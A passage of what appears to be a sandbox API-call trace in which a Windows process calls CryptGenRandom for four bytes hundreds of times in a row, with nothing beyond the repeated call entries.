dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.099] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: 